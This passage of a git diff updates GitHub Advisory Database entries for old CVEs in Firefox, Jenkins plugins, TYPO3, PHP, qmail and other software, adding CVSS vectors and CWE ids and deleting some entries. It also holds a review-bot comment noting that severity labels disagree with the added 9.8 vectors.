"https://jenkins.io/security/advisory/2019-04-03/#SECURITY-981" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-862" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file 
diff --git a/advisories/unreviewed/2022/05/GHSA-m5jc-6mwc-7vc7/GHSA-m5jc-6mwc-7vc7.json b/advisories/unreviewed/2022/05/GHSA-m5jc-6mwc-7vc7/GHSA-m5jc-6mwc-7vc7.json
index 5b4b22e9b75cc..bed7b920417c0 100644
--- a/advisories/unreviewed/2022/05/GHSA-m5jc-6mwc-7vc7/GHSA-m5jc-6mwc-7vc7.json
+++ b/advisories/unreviewed/2022/05/GHSA-m5jc-6mwc-7vc7/GHSA-m5jc-6mwc-7vc7.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-m5jc-6mwc-7vc7",
- "modified": "2022-05-17T01:04:52Z",
+ "modified": "2024-02-03T03:30:26Z",
 "published": "2022-05-17T01:04:52Z",
 "aliases": [
 "CVE-2010-2753"
 ],
 "details": "Integer overflow in Mozilla Firefox 3.5.x before 3.5.11 and 3.6.x before 3.6.7, Thunderbird 3.0.x before 3.0.6 and 3.1.x before 3.1.1, and SeaMonkey before 2.0.6 allows remote attackers to execute arbitrary code via a large selection attribute in a XUL tree element, which triggers a use-after-free.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -49,7 +52,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-190"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-m65m-xrgm-j736/GHSA-m65m-xrgm-j736.json b/advisories/unreviewed/2022/05/GHSA-m65m-xrgm-j736/GHSA-m65m-xrgm-j736.json
index 52081fd263dc3..976f8e3023185 100644
--- a/advisories/unreviewed/2022/05/GHSA-m65m-xrgm-j736/GHSA-m65m-xrgm-j736.json
+++ b/advisories/unreviewed/2022/05/GHSA-m65m-xrgm-j736/GHSA-m65m-xrgm-j736.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-m65m-xrgm-j736",
- "modified": "2022-05-01T01:48:04Z",
+ "modified": "2024-02-02T03:30:30Z",
 "published": "2022-05-01T01:48:04Z",
 "aliases": [
 "CVE-2005-0269"
 ],
 "details": "The file extension check in GNUBoard 3.40 and earlier only verifies extensions that contain all lowercase letters, which allows remote attackers to upload arbitrary files via file extensions that include uppercase letters.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -37,7 +40,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-178"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-m68x-cc2f-gr5h/GHSA-m68x-cc2f-gr5h.json b/advisories/unreviewed/2022/05/GHSA-m68x-cc2f-gr5h/GHSA-m68x-cc2f-gr5h.json
deleted file mode 100644
index 2a47681b287c9..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-m68x-cc2f-gr5h/GHSA-m68x-cc2f-gr5h.json
+++ /dev/null
@@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-m68x-cc2f-gr5h", - "modified": "2022-05-13T01:40:54Z", - "published": "2022-05-13T01:40:54Z", - "aliases": [ - "CVE-2017-1000095" - ], - "details": "The default whitelist included the following unsafe entries: DefaultGroovyMethods.putAt(Object, String, Object); DefaultGroovyMethods.getAt(Object, String). These allowed circumventing many of the access restrictions implemented in the script sandbox by using e.g. currentBuild['rawBuild'] rather than currentBuild.rawBuild. Additionally, the following entries allowed accessing private data that would not be accessible otherwise due to script security: groovy.json.JsonOutput.toJson(Closure); groovy.json.JsonOutput.toJson(Object).", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000095" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-07-10/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-732" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2017-10-05T01:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-m7rg-85g8-28m9/GHSA-m7rg-85g8-28m9.json b/advisories/unreviewed/2022/05/GHSA-m7rg-85g8-28m9/GHSA-m7rg-85g8-28m9.json deleted file mode 100644 index 70e11da758d0f..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-m7rg-85g8-28m9/GHSA-m7rg-85g8-28m9.json +++ /dev/null 
@@ -1,59 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-m7rg-85g8-28m9", - "modified": "2022-05-02T03:47:10Z", - "published": "2022-05-02T03:47:10Z", - "aliases": [ - "CVE-2009-3633" - ], - "details": "Cross-site scripting (XSS) vulnerability in the t3lib_div::quoteJSvalue API function in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the sanitizing algorithm.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3633" - }, - { - "type": "WEB", - "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53925" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=oss-security&m=125632856206736&w=2" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=oss-security&m=125633199111438&w=2" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/37122" - }, - { - "type": "WEB", - "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-016/" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/36801" - }, - { - "type": "WEB", - "url": "http://www.vupen.com/english/advisories/2009/3009" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2009-11-02T15:30:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-m9m5-q9x5-6877/GHSA-m9m5-q9x5-6877.json b/advisories/unreviewed/2022/05/GHSA-m9m5-q9x5-6877/GHSA-m9m5-q9x5-6877.json index 11511b82bb152..0d9f9c0f4f9d8 100644 --- a/advisories/unreviewed/2022/05/GHSA-m9m5-q9x5-6877/GHSA-m9m5-q9x5-6877.json +++ b/advisories/unreviewed/2022/05/GHSA-m9m5-q9x5-6877/GHSA-m9m5-q9x5-6877.json 
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-m9m5-q9x5-6877",
- "modified": "2022-05-01T23:31:45Z",
+ "modified": "2024-02-02T15:30:27Z",
 "published": "2022-05-01T23:31:45Z",
 "aliases": [
 "CVE-2008-0599"
 ],
 "details": "The init_request_info function in sapi/cgi/cgi_main.c in PHP before 5.2.6 does not properly consider operator precedence when calculating the length of PATH_TRANSLATED, which might allow remote attackers to execute arbitrary code via a crafted URI.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -165,7 +168,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-131"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-mf54-6363-29h5/GHSA-mf54-6363-29h5.json b/advisories/unreviewed/2022/05/GHSA-mf54-6363-29h5/GHSA-mf54-6363-29h5.json
index 4c06abebab56d..991ba0758a6d6 100644
--- a/advisories/unreviewed/2022/05/GHSA-mf54-6363-29h5/GHSA-mf54-6363-29h5.json
+++ b/advisories/unreviewed/2022/05/GHSA-mf54-6363-29h5/GHSA-mf54-6363-29h5.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-mf54-6363-29h5",
- "modified": "2022-05-01T23:27:33Z",
+ "modified": "2024-02-03T03:30:26Z",
 "published": "2022-05-01T23:27:33Z",
 "aliases": [
 "CVE-2008-0077"
 ],
 "details": "Use-after-free vulnerability in Microsoft Internet Explorer 6 SP1, 6 SP2, and and 7 allows remote attackers to execute arbitrary code by assigning malformed values to certain properties, as demonstrated using the by property of an animateMotion SVG element, aka \"Property Memory Corruption Vulnerability.\"",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -69,7 +72,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-416"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
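Review bot: The CVSS:3.1 vector added in the first hunk of the GHSA-m9m5-q9x5-6877 section (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, a 9.8 base score, which is CRITICAL on the v3 qualitative scale) now sits beside an unchanged `"severity": "HIGH",` context line in the second hunk's `database_specific`, so the file carries two severity signals that disagree. If the label is meant to follow the v3.1 vector it should become `"severity": "CRITICAL",`; if it is intentionally carried over from the older v2-era rating, that is worth stating in the commit message, because consumers that key on the label will rank this advisory lower than the vector implies. The same mismatch appears in the GHSA-mrmc-m8fj-g9px section (same 9.8 vector beside `"severity": "MODERATE",`) and the GHSA-pp56-6c5p-hfmv section (same vector beside `"severity": "HIGH",`).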
diff --git a/advisories/unreviewed/2022/05/GHSA-mg66-3x8x-r8g2/GHSA-mg66-3x8x-r8g2.json b/advisories/unreviewed/2022/05/GHSA-mg66-3x8x-r8g2/GHSA-mg66-3x8x-r8g2.json
deleted file mode 100644
index 33e86585cdc54..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-mg66-3x8x-r8g2/GHSA-mg66-3x8x-r8g2.json
+++ /dev/null
@@ -1,55 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-mg66-3x8x-r8g2",
- "modified": "2022-05-02T03:46:56Z",
- "published": "2022-05-02T03:46:56Z",
- "aliases": [
- "CVE-2009-3630"
- ],
- "details": "The Backend subcomponent in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2 allows remote authenticated users to place arbitrary web sites in TYPO3 backend framesets via crafted parameters, related to a \"frame hijacking\" issue.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3630"
- },
- {
- "type": "WEB",
- "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53920"
- },
- {
- "type": "WEB",
- "url": "http://marc.info/?l=oss-security&m=125632856206736&w=2"
- },
- {
- "type": "WEB",
- "url": "http://secunia.com/advisories/37122"
- },
- {
- "type": "WEB",
- "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-016/"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/36801"
- },
- {
- "type": "WEB",
- "url": "http://www.vupen.com/english/advisories/2009/3009"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2009-11-02T15:30:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-mg67-hj6h-72h8/GHSA-mg67-hj6h-72h8.json b/advisories/unreviewed/2022/05/GHSA-mg67-hj6h-72h8/GHSA-mg67-hj6h-72h8.json
index 35b1d5ad9b6af..d408f412a9c58 100644
--- a/advisories/unreviewed/2022/05/GHSA-mg67-hj6h-72h8/GHSA-mg67-hj6h-72h8.json
+++ b/advisories/unreviewed/2022/05/GHSA-mg67-hj6h-72h8/GHSA-mg67-hj6h-72h8.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-mg67-hj6h-72h8",
- "modified": "2022-05-02T03:40:54Z",
+ "modified": "2024-02-08T21:30:31Z",
 "published": "2022-05-02T03:40:54Z",
 "aliases": [
 "CVE-2009-3022"
 ],
 "details": "Cross-site request forgery (CSRF) vulnerability in bingo!CMS 1.2 and earlier allows remote attackers to hijack the authentication of other users for requests that modify configuration or change content via unspecified vectors.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
+ }
 ],
 "affected": [
 
diff --git a/advisories/unreviewed/2022/05/GHSA-mg72-h5gj-8gg7/GHSA-mg72-h5gj-8gg7.json b/advisories/unreviewed/2022/05/GHSA-mg72-h5gj-8gg7/GHSA-mg72-h5gj-8gg7.json
deleted file mode 100644
index 025b8a3150f96..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-mg72-h5gj-8gg7/GHSA-mg72-h5gj-8gg7.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-mg72-h5gj-8gg7",
- "modified": "2023-10-25T18:31:24Z",
- "published": "2022-05-24T16:52:45Z",
- "aliases": [
- "CVE-2019-10377"
- ],
- "details": "A missing permission check in Jenkins Avatar Plugin 1.2 and earlier allows attackers with Overall/Read access to change the avatar of any user of Jenkins.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10377"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-08-07/#SECURITY-1099"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/08/07/1"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-862"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-08-07T15:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-mhwq-4mh7-fv7c/GHSA-mhwq-4mh7-fv7c.json b/advisories/unreviewed/2022/05/GHSA-mhwq-4mh7-fv7c/GHSA-mhwq-4mh7-fv7c.json
deleted file mode 100644
index f1fb107a676bf..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-mhwq-4mh7-fv7c/GHSA-mhwq-4mh7-fv7c.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-mhwq-4mh7-fv7c",
- "modified": "2022-05-13T01:40:55Z",
- "published": "2022-05-13T01:40:55Z",
- "aliases": [
- "CVE-2017-1000096"
- ],
- "details": "Arbitrary code execution due to incomplete sandbox protection: Constructors, instance variable initializers, and instance initializers in Pipeline scripts were not subject to sandbox protection, and could therefore execute arbitrary code. This could be exploited e.g. by regular Jenkins users with the permission to configure Pipelines in Jenkins, or by trusted committers to repositories containing Jenkinsfiles.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000096"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2017-07-10/"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/99571"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-732"
- ],
- "severity": "HIGH",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2017-10-05T01:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-mmjh-45vj-hfvf/GHSA-mmjh-45vj-hfvf.json b/advisories/unreviewed/2022/05/GHSA-mmjh-45vj-hfvf/GHSA-mmjh-45vj-hfvf.json
deleted file mode 100644
index a95fa47a1e3a4..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-mmjh-45vj-hfvf/GHSA-mmjh-45vj-hfvf.json
+++ /dev/null
@@ -1,79 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-mmjh-45vj-hfvf",
- "modified": "2022-05-17T05:50:10Z",
- "published": "2022-05-17T05:50:10Z",
- "aliases": [
- "CVE-2010-2274"
- ],
- "details": "Multiple open redirect vulnerabilities in Dojo 1.0.x before 1.0.3, 1.1.x before 1.1.2, 1.2.x before 1.2.4, 1.3.x before 1.3.3, and 1.4.x before 1.4.2 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors, possibly related to dojo/resources/iframe_history.html, dojox/av/FLAudio.js, dojox/av/FLVideo.js, dojox/av/resources/audio.swf, dojox/av/resources/video.swf, util/buildscripts/jslib/build.js, util/buildscripts/jslib/buildUtil.js, and util/doh/runner.html.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2274"
- },
- {
- "type": "WEB",
- "url": "http://dojotoolkit.org/blog/post/dylan/2010/03/dojo-security-advisory/"
- },
- {
- "type": "WEB",
- "url": "http://secunia.com/advisories/38964"
- },
- {
- "type": "WEB",
- "url": "http://secunia.com/advisories/40007"
- },
- {
- "type": "WEB",
- "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21431472"
- },
- {
- "type": "WEB",
- "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1LO50833"
- },
- {
- "type": "WEB",
- "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1LO50849"
- },
- {
- "type": "WEB",
- "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1LO50856"
- },
- {
- "type": "WEB",
- "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1LO50896"
- },
- {
- "type": "WEB",
- "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1LO50932"
- },
- {
- "type": "WEB",
- "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1LO50958"
- },
- {
- "type": "WEB",
- "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1LO50994"
- },
- {
- "type": "WEB",
- "url": "http://www.vupen.com/english/advisories/2010/1281"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2010-06-15T14:30:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-mmrv-3cqg-hpf9/GHSA-mmrv-3cqg-hpf9.json b/advisories/unreviewed/2022/05/GHSA-mmrv-3cqg-hpf9/GHSA-mmrv-3cqg-hpf9.json
deleted file mode 100644
index 8ca9104e2e754..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-mmrv-3cqg-hpf9/GHSA-mmrv-3cqg-hpf9.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-mmrv-3cqg-hpf9",
- "modified": "2022-05-13T01:31:35Z",
- "published": "2022-05-13T01:31:35Z",
- "aliases": [
- "CVE-2019-1003007"
- ],
- "details": "A cross-site request forgery vulnerability exists in Jenkins Warnings Plugin 5.0.0 and earlier in src/main/java/hudson/plugins/warnings/GroovyParser.java that allows attackers to execute arbitrary code via a form validation HTTP endpoint.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003007"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-01-28/#SECURITY-1295%20%281%29"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-01-28/#SECURITY-1295%20(1)"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-352"
- ],
- "severity": "HIGH",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-02-06T16:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-mmx6-xv2h-w7x8/GHSA-mmx6-xv2h-w7x8.json b/advisories/unreviewed/2022/05/GHSA-mmx6-xv2h-w7x8/GHSA-mmx6-xv2h-w7x8.json
index a56ac65a48602..7548213bc6699 100644
--- a/advisories/unreviewed/2022/05/GHSA-mmx6-xv2h-w7x8/GHSA-mmx6-xv2h-w7x8.json
+++ b/advisories/unreviewed/2022/05/GHSA-mmx6-xv2h-w7x8/GHSA-mmx6-xv2h-w7x8.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-mmx6-xv2h-w7x8",
- "modified": "2022-05-24T16:56:27Z",
+ "modified": "2024-02-08T21:30:32Z",
 "published": "2022-05-24T16:56:27Z",
 "aliases": [
 "CVE-2019-16215"
 ],
 "details": "The Markdown parser in Zulip server before 2.0.5 used a regular expression vulnerable to exponential backtracking. A user who is logged into the server could send a crafted message causing the server to spend an effectively arbitrary amount of CPU time and stall the processing of future messages.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
+ }
 ],
 "affected": [
 
@@ -29,7 +32,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-1333"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-mpw2-6pxv-5r2w/GHSA-mpw2-6pxv-5r2w.json b/advisories/unreviewed/2022/05/GHSA-mpw2-6pxv-5r2w/GHSA-mpw2-6pxv-5r2w.json
index 976f79178eae6..5a539e876ffba 100644
--- a/advisories/unreviewed/2022/05/GHSA-mpw2-6pxv-5r2w/GHSA-mpw2-6pxv-5r2w.json
+++ b/advisories/unreviewed/2022/05/GHSA-mpw2-6pxv-5r2w/GHSA-mpw2-6pxv-5r2w.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-mpw2-6pxv-5r2w",
- "modified": "2022-05-24T17:37:34Z",
+ "modified": "2024-02-02T15:30:27Z",
 "published": "2022-05-24T17:37:34Z",
 "aliases": [
 "CVE-2019-25011"
 ],
 "details": "NetBox through 2.6.2 allows an Authenticated User to conduct an XSS attack against an admin via a GFM-rendered field, as demonstrated by /dcim/sites/add/ comments.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
+ }
 ],
 "affected": [
 
diff --git a/advisories/unreviewed/2022/05/GHSA-mqj3-fc39-73fj/GHSA-mqj3-fc39-73fj.json b/advisories/unreviewed/2022/05/GHSA-mqj3-fc39-73fj/GHSA-mqj3-fc39-73fj.json
deleted file mode 100644
index 71971192f9281..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-mqj3-fc39-73fj/GHSA-mqj3-fc39-73fj.json
+++ /dev/null
@@ -1,46 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-mqj3-fc39-73fj",
- "modified": "2023-10-25T18:31:21Z",
- "published": "2022-05-24T22:00:03Z",
- "aliases": [
- "CVE-2019-10324"
- ],
- "details": "A cross-site request forgery vulnerability in Jenkins Artifactory Plugin 3.2.2 and earlier in ReleaseAction#doSubmit, GradleReleaseApiAction#doStaging, MavenReleaseApiAction#doStaging, and UnifiedPromoteBuildAction#doSubmit allowed attackers to schedule a release build, perform release staging for Gradle and Maven projects, and promote previously staged builds, respectively.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10324"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-05-31/#SECURITY-1347"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/05/31/2"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/108540"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-352"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-05-31T15:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-mqmr-46gm-2w7q/GHSA-mqmr-46gm-2w7q.json b/advisories/unreviewed/2022/05/GHSA-mqmr-46gm-2w7q/GHSA-mqmr-46gm-2w7q.json
index 5ec615007c978..b2b48f9658f03 100644
--- a/advisories/unreviewed/2022/05/GHSA-mqmr-46gm-2w7q/GHSA-mqmr-46gm-2w7q.json
+++ b/advisories/unreviewed/2022/05/GHSA-mqmr-46gm-2w7q/GHSA-mqmr-46gm-2w7q.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-mqmr-46gm-2w7q",
- "modified": "2022-05-02T06:11:16Z",
+ "modified": "2024-02-02T03:30:31Z",
 "published": "2022-05-02T06:11:16Z",
 "aliases": [
 "CVE-2010-0258"
 ],
 "details": "Microsoft Office Excel 2002 SP3, 2003 SP3, and 2007 SP1 and SP2; Office 2004 and 2008 for Mac; Open XML File Format Converter for Mac; Office Excel Viewer SP1 and SP2; and Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2 do not properly parse the Excel file format, which allows remote attackers to execute arbitrary code via a crafted spreadsheet that causes memory to be interpreted as a different object type than intended, aka \"Microsoft Office Excel Sheet Object Type Confusion Vulnerability.\"",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -41,6 +44,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
+ "CWE-843",
 "CWE-94"
 ],
 "severity": "HIGH",
diff --git a/advisories/unreviewed/2022/05/GHSA-mrjp-428h-53c5/GHSA-mrjp-428h-53c5.json b/advisories/unreviewed/2022/05/GHSA-mrjp-428h-53c5/GHSA-mrjp-428h-53c5.json
index 53a62189e04d6..942d54e31c544 100644
--- a/advisories/unreviewed/2022/05/GHSA-mrjp-428h-53c5/GHSA-mrjp-428h-53c5.json
+++ b/advisories/unreviewed/2022/05/GHSA-mrjp-428h-53c5/GHSA-mrjp-428h-53c5.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-mrjp-428h-53c5",
- "modified": "2022-05-02T06:22:51Z",
+ "modified": "2024-02-02T18:30:22Z",
 "published": "2022-05-02T06:22:51Z",
 "aliases": [
 "CVE-2010-1437"
 ],
 "details": "Race condition in the find_keyring_by_name function in security/keys/keyring.c in the Linux kernel 2.6.34-rc5 and earlier allows local users to cause a denial of service (memory corruption and system crash) or possibly have unspecified other impact via keyctl session commands that trigger access to a dead keyring that is undergoing deletion by the key_cleanup function.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
diff --git a/advisories/unreviewed/2022/05/GHSA-mrmc-m8fj-g9px/GHSA-mrmc-m8fj-g9px.json b/advisories/unreviewed/2022/05/GHSA-mrmc-m8fj-g9px/GHSA-mrmc-m8fj-g9px.json
index b73cfcc36322f..43010779e3b48 100644
--- a/advisories/unreviewed/2022/05/GHSA-mrmc-m8fj-g9px/GHSA-mrmc-m8fj-g9px.json
+++ b/advisories/unreviewed/2022/05/GHSA-mrmc-m8fj-g9px/GHSA-mrmc-m8fj-g9px.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-mrmc-m8fj-g9px",
- "modified": "2022-05-01T01:59:28Z",
+ "modified": "2024-02-08T21:30:30Z",
 "published": "2022-05-01T01:59:28Z",
 "aliases": [
 "CVE-2005-1513"
 ],
 "details": "Integer overflow in the stralloc_readyplus function in qmail, when running on 64 bit platforms with a large amount of virtual memory, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large SMTP request.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -93,7 +96,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-190"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-mvpr-q6rh-8vrp/GHSA-mvpr-q6rh-8vrp.json b/advisories/unreviewed/2022/05/GHSA-mvpr-q6rh-8vrp/GHSA-mvpr-q6rh-8vrp.json
deleted file mode 100644
index f4c43c217466d..0000000000000
